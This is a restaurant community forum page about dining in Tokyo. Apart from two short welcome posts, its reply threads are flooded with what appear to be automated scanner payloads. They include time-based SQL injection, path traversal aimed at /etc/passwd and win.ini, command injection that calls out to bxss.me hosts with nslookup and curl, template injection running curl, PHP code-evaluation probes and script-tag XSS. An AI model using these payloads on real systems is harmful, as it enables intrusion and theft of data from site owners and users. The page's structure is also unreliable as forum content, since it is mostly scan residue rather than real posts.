Welcome to our community!
I want this to be a two-way exchange of information, not just with me but with all of you. Please feel free to post your questions as well as your restaurant reviews, dining companionship, and so on.
Copyright © 2015 TokyoTableTrip All Rights Reserved.
14 Comments
Hello! I’m looking forward to reading the questions and posts here. Is anyone going to be in Tokyo from Early to mid December? I’d love to meet some likeminded foodies
re: iambenjaminw
pG6NJ7GX
re: iambenjaminw
1*
re: iambenjaminw
1*
re: iambenjaminw
1*
re: iambenjaminw
1*
re: iambenjaminw
-1 OR 2+570-570-1=0+0+0+1
re: iambenjaminw
-1 OR 3+570-570-1=0+0+0+1
re: iambenjaminw
if(now()=sysdate(),sleep(15),0)
re: iambenjaminw
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: iambenjaminw
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: iambenjaminw
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: iambenjaminw
-1; waitfor delay '0:0:15' --
re: iambenjaminw
-1); waitfor delay '0:0:15' --
re: iambenjaminw
1 waitfor delay '0:0:15' --
re: iambenjaminw
zx1rn8ZD'; waitfor delay '0:0:15' --
re: iambenjaminw
-5 OR 297=(SELECT 297 FROM PG_SLEEP(15))--
re: iambenjaminw
-5) OR 578=(SELECT 578 FROM PG_SLEEP(15))--
re: iambenjaminw
-1)) OR 768=(SELECT 768 FROM PG_SLEEP(15))--
re: iambenjaminw
vNgoHdau' OR 68=(SELECT 68 FROM PG_SLEEP(15))--
re: iambenjaminw
JurgCCNI') OR 299=(SELECT 299 FROM PG_SLEEP(15))--
re: iambenjaminw
oqkMdYbY')) OR 138=(SELECT 138 FROM PG_SLEEP(15))--
re: iambenjaminw
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: iambenjaminw
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: iambenjaminw
'||(select 1 from (select pg_sleep(15))x)||'
re: iambenjaminw
''||(select 1 from (select pg_sleep(15))x)||''
re: iambenjaminw
1'"
re: iambenjaminw
@@KXXcy
re: iambenjaminw
1XrpGyZ7nO
re: iambenjaminw
<esi:include src="http://bxss.me/rpb.png"/>
re: iambenjaminw
%0abcc:074625.67-22361.67.ef8b6.19990.2@bxss.me
re: iambenjaminw
response.write(9528983*9718538)
re: iambenjaminw
to@example.com>%0d%0abcc:074625.67-22362.67.ef8b6.19990.2@bxss.me
re: iambenjaminw
'+response.write(9528983*9718538)+'
re: iambenjaminw
"+response.write(9528983*9718538)+"
re: iambenjaminw
${9999374+9999806}
re: iambenjaminw
../../../../../../../../../../../../../../etc/passwd
re: iambenjaminw
../../../../../../../../../../../../../../windows/win.ini
re: iambenjaminw
file:///etc/passwd
re: iambenjaminw
../../../../../../../../../../../../../../../proc/version
re: iambenjaminw
'.gethostbyname(lc('hithr'.'wziqmhctf8a79.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(104).chr(88).chr(104).chr(65).'
re: iambenjaminw
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: iambenjaminw
)
re: iambenjaminw
".gethostbyname(lc("hitqj"."mwhlkixx86043.bxss.me."))."A".chr(67).chr(hex("58")).chr(111).chr(82).chr(102).chr(71)."
re: iambenjaminw
../../../../../../../../../../etc/passwd%00.jpg
re: iambenjaminw
!(()&&!|*|*|
re: iambenjaminw
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: iambenjaminw
^(#$!@#$)(()))******
re: iambenjaminw
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: iambenjaminw
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: iambenjaminw
/etc/passwd
re: iambenjaminw
echo xnacjp$()\ xenipa\nz^xyu||a #' &echo xnacjp$()\ xenipa\nz^xyu||a #|" &echo xnacjp$()\ xenipa\nz^xyu||a #
re: iambenjaminw
%2fetc%2fpasswd
re: iambenjaminw
&echo qpknvr$()\ atbqsb\nz^xyu||a #' &echo qpknvr$()\ atbqsb\nz^xyu||a #|" &echo qpknvr$()\ atbqsb\nz^xyu||a #
re: iambenjaminw
/.././.././.././.././.././.././.././../etc/./passwd%00
re: iambenjaminw
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: iambenjaminw
|echo uvpxzm$()\ hifkjy\nz^xyu||a #' |echo uvpxzm$()\ hifkjy\nz^xyu||a #|" |echo uvpxzm$()\ hifkjy\nz^xyu||a #
re: iambenjaminw
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: iambenjaminw
HttP://bxss.me/t/xss.html?%00
re: iambenjaminw
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: iambenjaminw
(nslookup hitnssvegvavce0b3e.bxss.me||perl -e "gethostbyname('hitnssvegvavce0b3e.bxss.me')")
re: iambenjaminw
"+"A".concat(70-3).concat(22*4).concat(112).concat(75).concat(110).concat(82)+(require"socket"
Socket.gethostbyname("hitjh"+"jkeynsofb5a83.bxss.me.")[3].to_s)+"
re: iambenjaminw
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: iambenjaminw
bxss.me/t/xss.html?%00
re: iambenjaminw
Http://bxss.me/t/fit.txt
re: iambenjaminw
$(nslookup hitukcfrkadhddb770.bxss.me||perl -e "gethostbyname('hitukcfrkadhddb770.bxss.me')")
re: iambenjaminw
'+'A'.concat(70-3).concat(22*4).concat(122).concat(74).concat(119).concat(78)+(require'socket'
Socket.gethostbyname('hitbs'+'jvhhecrx20d5e.bxss.me.')[3].to_s)+'
re: iambenjaminw
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: iambenjaminw
http://bxss.me/t/fit.txt%3F.jpg
re: iambenjaminw
&nslookup hitijrbzglvyaef44a.bxss.me&'\"`0&nslookup hitijrbzglvyaef44a.bxss.me&`'
re: iambenjaminw
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: iambenjaminw
/etc/shells
re: iambenjaminw
&(nslookup hitsojjpiogpc44341.bxss.me||perl -e "gethostbyname('hitsojjpiogpc44341.bxss.me')")&'\"`0&(nslookup hitsojjpiogpc44341.bxss.me||perl -e "gethostbyname('hitsojjpiogpc44341.bxss.me')")&`'
re: iambenjaminw
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: iambenjaminw
c:/windows/win.ini
re: iambenjaminw
|(nslookup hitezvfneobnmbca37.bxss.me||perl -e "gethostbyname('hitezvfneobnmbca37.bxss.me')")
re: iambenjaminw
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: iambenjaminw
file:///etc/passwd
re: iambenjaminw
bxss.me
re: iambenjaminw
`(nslookup hitypypswuanu806bb.bxss.me||perl -e "gethostbyname('hitypypswuanu806bb.bxss.me')")`
re: iambenjaminw
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: iambenjaminw
/\../\../\../\../\../\../\../etc/passwd
re: iambenjaminw
;(nslookup hitebnljrnlxd1e760.bxss.me||perl -e "gethostbyname('hitebnljrnlxd1e760.bxss.me')")|(nslookup hitebnljrnlxd1e760.bxss.me||perl -e "gethostbyname('hitebnljrnlxd1e760.bxss.me')")&(nslookup hitebnljrnlxd1e760.bxss.me||perl -e "gethostbyname('hitebnljrnlxd1e760.bxss.me')")
re: iambenjaminw
';print(md5(31337));$a='
re: iambenjaminw
/WEB-INF/web.xml
re: iambenjaminw
";print(md5(31337));$a="
re: iambenjaminw
C:\WINDOWS\system32\drivers\etc\hosts
re: iambenjaminw
${@print(md5(31337))}
re: iambenjaminw
'"
re: iambenjaminw
../../../../../../../../../../windows/win.ini%00.jpg
re: iambenjaminw
${@print(md5(31337))}\
re: iambenjaminw
<!--
re: iambenjaminw
/../../../../../../../../../../boot.ini
re: iambenjaminw
'.print(md5(31337)).'
re: iambenjaminw
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: iambenjaminw
..\..\..\..\..\..\..\..\windows\win.ini
re: iambenjaminw
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: iambenjaminw
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: iambenjaminw
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: iambenjaminw
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: iambenjaminw
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: iambenjaminw
WEB-INF/web.xml
re: iambenjaminw
WEB-INF\web.xml
re: iambenjaminw
19TSLG7MI0
re: iambenjaminw
response.write(9605600*9941243)
re: iambenjaminw
'+response.write(9605600*9941243)+'
re: iambenjaminw
"+response.write(9605600*9941243)+"
re: iambenjaminw
${10000295+9999369}
re: iambenjaminw
<esi:include src="http://bxss.me/rpb.png"/>
re: iambenjaminw
../../../../../../../../../../../../../../etc/passwd
re: iambenjaminw
../../../../../../../../../../../../../../windows/win.ini
re: iambenjaminw
file:///etc/passwd
re: iambenjaminw
../
re: iambenjaminw
)
re: iambenjaminw
!(()&&!|*|*|
re: iambenjaminw
^(#$!@#$)(()))******
re: iambenjaminw
redirtest.acx
re: iambenjaminw
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
re: iambenjaminw
echo utycau$()\ bnjuji\nz^xyu||a #' &echo utycau$()\ bnjuji\nz^xyu||a #|" &echo utycau$()\ bnjuji\nz^xyu||a #
re: iambenjaminw
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpg
re: iambenjaminw
&echo gkqvpr$()\ qebxcu\nz^xyu||a #' &echo gkqvpr$()\ qebxcu\nz^xyu||a #|" &echo gkqvpr$()\ qebxcu\nz^xyu||a #
re: iambenjaminw
/etc/shells
re: iambenjaminw
'.gethostbyname(lc('hitgi'.'thsjjamz61c4b.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(115).chr(87).chr(122).chr(69).'
re: iambenjaminw
|echo fxftiv$()\ icejhl\nz^xyu||a #' |echo fxftiv$()\ icejhl\nz^xyu||a #|" |echo fxftiv$()\ icejhl\nz^xyu||a #
re: iambenjaminw
../../../../../../../../../../../../../../etc/shells
re: iambenjaminw
".gethostbyname(lc("hitfj"."lbmjjbkiecd66.bxss.me."))."A".chr(67).chr(hex("58")).chr(106).chr(75).chr(97).chr(76)."
re: iambenjaminw
c:/windows/win.ini
re: iambenjaminw
expr 9000895186 - 919668
re: iambenjaminw
gethostbyname(lc('hitxa'.'cwykhcjsc0788.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(98).chr(83).chr(121).chr(68)
re: iambenjaminw
bxss.me
re: iambenjaminw
(nslookup -q=cname hitkuglylkfvm78717.bxss.me||curl hitkuglylkfvm78717.bxss.me))
re: iambenjaminw
Http://bxss.me/t/fit.txt
re: iambenjaminw
$(nslookup -q=cname hitebjlqhdfyu002fe.bxss.me||curl hitebjlqhdfyu002fe.bxss.me)
re: iambenjaminw
http://bxss.me/t/fit.txt?.jpg
re: iambenjaminw
&nslookup -q=cname hitaloirpjfaj4cffc.bxss.me&'\"`0&nslookup -q=cname hitaloirpjfaj4cffc.bxss.me&`'
re: iambenjaminw
&(nslookup -q=cname hitqmtpfvzrqefb3df.bxss.me||curl hitqmtpfvzrqefb3df.bxss.me)&'\"`0&(nslookup -q=cname hitqmtpfvzrqefb3df.bxss.me||curl hitqmtpfvzrqefb3df.bxss.me)&`'
re: iambenjaminw
ctime
sleep
p0
(I30
tp1
Rp2
.
re: iambenjaminw
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: iambenjaminw
|(nslookup -q=cname hitvebjbnutzf00a79.bxss.me||curl hitvebjbnutzf00a79.bxss.me)
re: iambenjaminw
';print(md5(31337));$a='
re: iambenjaminw
`(nslookup -q=cname hittaubbooegkf42cb.bxss.me||curl hittaubbooegkf42cb.bxss.me)`
re: iambenjaminw
";print(md5(31337));$a="
re: iambenjaminw
;(nslookup -q=cname hitmmhlwkxdfm2751e.bxss.me||curl hitmmhlwkxdfm2751e.bxss.me)|(nslookup -q=cname hitmmhlwkxdfm2751e.bxss.me||curl hitmmhlwkxdfm2751e.bxss.me)&(nslookup -q=cname hitmmhlwkxdfm2751e.bxss.me||curl hitmmhlwkxdfm2751e.bxss.me)
re: iambenjaminw
'"()
re: iambenjaminw
${@print(md5(31337))}
re: iambenjaminw
|(nslookup${IFS}-q${IFS}cname${IFS}hitzeuvlpppkk247c7.bxss.me||curl${IFS}hitzeuvlpppkk247c7.bxss.me)
re: iambenjaminw
${@print(md5(31337))}\
re: iambenjaminw
'&&sleep(27*1000)*mvytuj&&'
re: iambenjaminw
&(nslookup${IFS}-q${IFS}cname${IFS}hitehngfaccefa3867.bxss.me||curl${IFS}hitehngfaccefa3867.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitehngfaccefa3867.bxss.me||curl${IFS}hitehngfaccefa3867.bxss.me)&`'
re: iambenjaminw
'.print(md5(31337)).'
re: iambenjaminw
"&&sleep(27*1000)*bovbxd&&"
re: iambenjaminw
'||sleep(27*1000)*lknwef||'
re: iambenjaminw
"||sleep(27*1000)*vobbrh||"
re: iambenjaminw
HttP://bxss.me/t/xss.html?%00
re: iambenjaminw
bxss.me/t/xss.html?%00
re: iambenjaminw
"+"A".concat(70-3).concat(22*4).concat(101).concat(76).concat(105).concat(80)+(require"socket"
Socket.gethostbyname("hituk"+"hnvuifuyc54af.bxss.me.")[3].to_s)+"
re: iambenjaminw
replies
re: iambenjaminw
'+'A'.concat(70-3).concat(22*4).concat(114).concat(79).concat(100).concat(69)+(require'socket'
Socket.gethostbyname('hitkn'+'dmsyarbz704cc.bxss.me.')[3].to_s)+'
re: iambenjaminw
replies�
re: iambenjaminw
'A'.concat(70-3).concat(22*4).concat(118).concat(65).concat(98).concat(84)+(require'socket'
Socket.gethostbyname('hitvz'+'iuvujbnj91447.bxss.me.')[3].to_s)
re: iambenjaminw
replies/.
re: iambenjaminw
'"
re: iambenjaminw
<!--
re: iambenjaminw
'"()&%<zzz><ScRiPt >Cxem(9475)</ScRiPt>
re: iambenjaminw
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hithussijyuliac12c.bxss.me")}}
re: iambenjaminw
'"()&%<zzz><ScRiPt >Cxem(9495)</ScRiPt>
re: iambenjaminw
9431480
re: iambenjaminw
RcXvrUuE
re: iambenjaminw
*1
re: iambenjaminw
*1
re: iambenjaminw
*1
re: iambenjaminw
*1
re: iambenjaminw
-1 OR 5*5=25 --
re: iambenjaminw
-1 OR 5*5=26 --
re: iambenjaminw
-1 OR 5*5=25
re: iambenjaminw
-1 OR 5*5=26
re: iambenjaminw
*if(now()=sysdate(),sleep(15),0)
re: iambenjaminw
0'XOR(
*if(now()=sysdate(),sleep(15),0))XOR'Z
re: iambenjaminw
0"XOR(
*if(now()=sysdate(),sleep(15),0))XOR"Z
re: iambenjaminw
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: iambenjaminw
-1; waitfor delay '0:0:15' --
re: iambenjaminw
-1); waitfor delay '0:0:15' --
re: iambenjaminw
-1 waitfor delay '0:0:15' --
re: iambenjaminw
GSYeprW0'; waitfor delay '0:0:15' --
re: iambenjaminw
-1 OR 468=(SELECT 468 FROM PG_SLEEP(15))--
re: iambenjaminw
-1) OR 593=(SELECT 593 FROM PG_SLEEP(15))--
re: iambenjaminw
-1)) OR 557=(SELECT 557 FROM PG_SLEEP(15))--
re: iambenjaminw
uQ4dGCR1' OR 473=(SELECT 473 FROM PG_SLEEP(15))--
re: iambenjaminw
17PcKjH5') OR 58=(SELECT 58 FROM PG_SLEEP(15))--
re: iambenjaminw
sjoLGLkD')) OR 312=(SELECT 312 FROM PG_SLEEP(15))--
re: iambenjaminw
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: iambenjaminw
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: iambenjaminw
'||(select 1 from (select pg_sleep(15))x)||'
re: iambenjaminw
''||(select 1 from (select pg_sleep(15))x)||''
re: iambenjaminw
'"
re: iambenjaminw
@@2IsQE
re: iambenjaminw
(select 198766*667891)
re: iambenjaminw
(select 198766*667891 from DUAL)
Thanks as always for all your support and information Saitosan, as indicated previously happy to offer some support for your ongoing efforts. Looking forward to interacting w/this community!
re: Shi
HAMvoXmf
re: Shi
1*
re: Shi
1*
re: Shi
1*
re: Shi
1*
re: Shi
-1 OR 2+753-753-1=0+0+0+1
re: Shi
-1 OR 3+753-753-1=0+0+0+1
re: Shi
if(now()=sysdate(),sleep(15),0)
re: Shi
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Shi
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Shi
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Shi
-1; waitfor delay '0:0:15' --
re: Shi
-1); waitfor delay '0:0:15' --
re: Shi
1 waitfor delay '0:0:15' --
re: Shi
nVO24VuN'; waitfor delay '0:0:15' --
re: Shi
-5 OR 524=(SELECT 524 FROM PG_SLEEP(15))--
re: Shi
-5) OR 62=(SELECT 62 FROM PG_SLEEP(15))--
re: Shi
-1)) OR 586=(SELECT 586 FROM PG_SLEEP(15))--
re: Shi
FZmy9UzP' OR 36=(SELECT 36 FROM PG_SLEEP(15))--
re: Shi
HMTm0TUY') OR 593=(SELECT 593 FROM PG_SLEEP(15))--
re: Shi
k71JD6En')) OR 972=(SELECT 972 FROM PG_SLEEP(15))--
re: Shi
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Shi
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Shi
'||(select 1 from (select pg_sleep(15))x)||'
re: Shi
''||(select 1 from (select pg_sleep(15))x)||''
re: Shi
1'"
re: Shi
@@dx56V
re: Shi
1Dfq6MR46gO
re: Shi
response.write(9704517*9758290)
re: Shi
'+response.write(9704517*9758290)+'
re: Shi
"+response.write(9704517*9758290)+"
re: Shi
<esi:include src="http://bxss.me/rpb.png"/>
re: Shi
../../../../../../../../../../../../../../etc/passwd
re: Shi
%0abcc:074625.67-22345.67.6c713.19990.2@bxss.me
re: Shi
../../../../../../../../../../../../../../windows/win.ini
re: Shi
to@example.com>%0d%0abcc:074625.67-22346.67.6c713.19990.2@bxss.me
re: Shi
file:///etc/passwd
re: Shi
${10000398+9999467}
re: Shi
../../../../../../../../../../../../../../../proc/version
re: Shi
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: Shi
../../../../../../../../../../etc/passwd%00.jpg
re: Shi
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: Shi
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: Shi
